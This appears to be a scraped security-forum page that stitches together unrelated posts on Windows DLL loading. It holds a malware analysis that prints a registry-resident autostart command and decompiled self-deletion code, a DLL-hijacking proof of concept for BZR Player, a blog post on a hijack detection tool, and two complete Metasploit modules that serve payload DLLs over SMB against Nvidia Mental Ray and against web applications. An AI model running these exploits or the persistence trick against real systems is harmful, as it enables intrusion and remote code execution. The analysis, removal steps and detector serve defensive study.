Search the Community

Cum as putea sa vad modulele importate de un executabil intr-un mod automat si rapid a unui executabil windows? Am niste fisiere/executabile care in fisier raw nu are importate anumite dll-uri pe care le folosesti si am nevoie sa stiu ce dll-uri sau functii de winapi foloseste in executia lui; Se poate vedea asta intr-o anumita masura si sa se poata face asta intr-un mod automat(gen script python sau commandline tool)? Pana acum am gasit dependency walker dar nu pare sa pot automatiza procesul si dureaza un pic pana obtin lista de dll-uri, respectiv listdlls de la sysinternals, dar e pentru procese care ruleaza deja, nu pentru fisiere/executabile statice

ome non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non typical: 1) This malware lives in registry value. 2) Non typical dropper self-deletion method, nothing zero day though. 3) Malware startup location protection in a backdoor Sirefef way. 4) It downloads, installs and uses Windows KB968930 (MS PowerShell). More details below 1) This malware stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and it autostart location is invisible to regedit, why explained in part 3. That's what really here. "Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy. Autostart malware script below. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") It purpose - read, encode and execute script stored in the "Default" value. The decoded malware now set as process environment variable named "a" and contains additional code to execute stored again as script code, lets call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware aware about WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX. This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread. 2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persist on infected computer only in the zombified processes VA and in the registry. First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile. Yeah I too can F5 in HexRays. signed int __stdcall sub_401696(LPCSTR lpExistingFileName) { char *NewFileName; struct _STARTUPINFOA StartupInfo; struct _PROCESS_INFORMATION ProcessInformation; snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName); if ( CopyFileA(lpExistingFileName, &NewFileName, 0) ) { StartupInfo.cb = 68; memset(&StartupInfo.lpReserved, 0, 0x40u); if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) ) { CloseHandle(ProcessInformation.hThread); CloseHandle(ProcessInformation.hProcess); return 1; } DeleteFileA(&NewFileName); } else { if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) ) return 1; } return 0; } 3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items). Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed. Detection and Removal instructions: This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals all you need to detect presense of this malware. Locate and terminate dllhost.exe running without parents (it is launched by powershell that after exists). regdelnull hkcu -s to remove forged Run subkey. Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who bring attention to this malware. Download pass: infected Source

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: BZR Player 1.03 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://bzrplayer.blazer.nu/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . #Vulnerable and Exploitable DLLs: output_dsound.dll codec_cdda.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_fsb.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_vag.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll codec_.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll codec_oggvorbis.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tremor.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_aiff.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll codec_flac.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll codec_mod.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll codec_s3m.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll output_winmm.dll codec_xm.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll codec_midi.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll codec_dls.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll output_wasapi.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll output_asio.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_writer.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll output_writer_nrt.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll output_nosound.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll output_nosound_nrt.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll codec_tag.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll #Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; } Source

Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code), rather than the legitimate library by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order which is a pre-defined standard on how Microsoft Windows searches for a DLL when the path has not been specified by the developer. Despite published advice on secure development practices to mitigate this threat, being available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as taking advantage of the security context of the loading program. How can DLL hijacking be detected? Okay - so it's up to the developers to be more secure in the way they load their libraries, but in the meanwhile how can we detect whether our systems have been compromised in this way? To achieve this I have been experimenting with a new methodology (well, at least it's new to me!) for detecting active attacks of this nature on vulnerable systems, and have written a program which does the following: 1. Iterate through each running process on the system, identifying all the DLLs which they have loaded 2. For each DLL, inspect all the locations where a malicious DLL could be placed 3. If a DLL with the same name appears in multiple locations in the search order, perform an analysis based on which location is currently loaded and highlight the possibility of a hijack to the user 4. Additionally: Check each DLL to see whether it has been digitally signed, and give the user the option to ignore all signed DLLs During testing I have found that DLL hijacking isn't always malicious, infact there are a whole bunch of digitally signed libraries which sit in the base directory of an application (perhaps they act differently to their generic counterparts?). Accordingly, in order to reduce the amount of noise returned by the tool, I implemented the '/unsigned' parameter, which I would recommend you use the first time you run it. This ignores cases where both the DLL which has actually been loaded, and others found in the search order are all signed (and therefore, more likely to be legit) - if you want to dig deep, feel free to leave this off! By default, the tool will only display the results where the library being examined was loaded from one of the 'DLL search order' paths, as otherwise it implies it was safely loaded from an alternative location. Unfortunately, this excludes the 'Current Working Directory' (due to a lack of an API to retrieve this data and undocumented internal memory structure changes between versions). If you want to override this you can, with the /verbose option (realistically, in conjunction with /unsigned to reduce the noise). This would be useful if you are looking for 'remote system, current working directory' style attacks as this displays entries with multiple potential DLLs irrespective of where it was loaded from. Demonstration of tool in action To test the tool, I created a vulnerable executable which does a single action: LoadLibrary(L"dll_hijack_test_dll.dll");. This sits alongside the associated DLL which, on being loaded, writes a message to the screen and sleeps forever to keep the program running. I put the DLL in two locations on the system: The path to the executable The Windows System directory (C:\Windows\System32) This now represents a common DLL hijacking attack in which the attacker would place the malicious DLL in the directory the program is launched from, which would be searched before the Windows System directory (where in this case, the legitimate DLL would be). Image 1. The demo program running with the DLL loaded The image above shows the demo running and the properties page from Process Hacker, which shows the DLL as being loaded. At this point we run dll_hijack_detect.exe, which produces the following result: Image 2. Output from dll_hijack_detect.exe on demo system Video demonstration As we can see, it has successfully identified the hijack and informed the user! Sound great! Where can I download a copy? I have release the source code and binaries, all of which are available from my github. In addition you will find a copy of the dll_hijack_test executable and DLL, so you can try it out for yourself! Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection', 'Description' => %q{ The Nvidia Mental Ray Satellite Service listens for control commands on port 7414. When it receives the command to load a DLL (via an UNC path) it will try to connect back to the host on port 7514. If a TCP connection is successful it will then attempt to load the DLL. This module has been tested successfully on Win7 x64 with Nvidia Mental Ray Satellite Service v3.11.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Discovery 'Donato Ferrante', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'References' => [ [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'win', 'Targets' => [ [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ] ], 'Privileged' => true, 'DisclosureDate' => 'Dec 10 2013', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(7414), OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("Trying to execute remote DLL...") send_exploit end def setup super # These lengths are required, although we specify the UNC path # length in the exploit, the header probably has another length # value we don't adjust. self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end def send_exploit # No idea what most of this hello is... hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7" hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000" hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000" hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f" hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000" hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000" hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000" hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009" hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000" hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000" hello << "0000000030000000a000000" hello = Rex::Text.hex_to_raw(hello) # Start of command - again no idea what this is... load_dll = Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013") # Length of path string including null byte load_dll << [unc.length + 1].pack('V') # Data type? load_dll << [2].pack('V') # Assembly Load? load_dll << "AL" load_dll << unc << "\x00" # Some padding at the end... load_dll << rand_text_alpha(1386 - unc.length) # We have to start a second listening port although we dont actually care about # handling client connections. It appears as long as the service can make a # connection its happy and will move onto the DLL loading create_listen_port vprint_status("Connecting to target and sending commands") connect sock.put(hello) sock.put(load_dll) print_status("Instructed the service to load #{unc}...") end def create_listen_port port = datastore['LISTEN_PORT'] comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end @listener = Rex::Socket::TcpServer.create( 'LocalHost' => datastore['SRVHOST'], 'LocalPort' => port, 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) # Register callbacks @listener.on_client_connect_proc = proc { |cli| add_socket(cli) begin print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...") ensure # Need to close the socket for the SMB request to be # initiated... remove_socket(cli) end } @listener.start vprint_status("Started listening on TCP port #{port}") end def cleanup super return unless @listener begin @listener.deref if @listener.is_a?(Rex::Service) if @listener.is_a?(Rex::Socket) @listener.close @listener.stop end @listener = nil rescue ::Exception end end end Source

This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This Metasploit module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic Web Application DLL Injection', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'Platform' => 'win', 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X86_64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['CWE', '427'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']), OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end def primer sploit = target_uri.to_s sploit << unc print_status("#{peer} - Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit }, 3) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end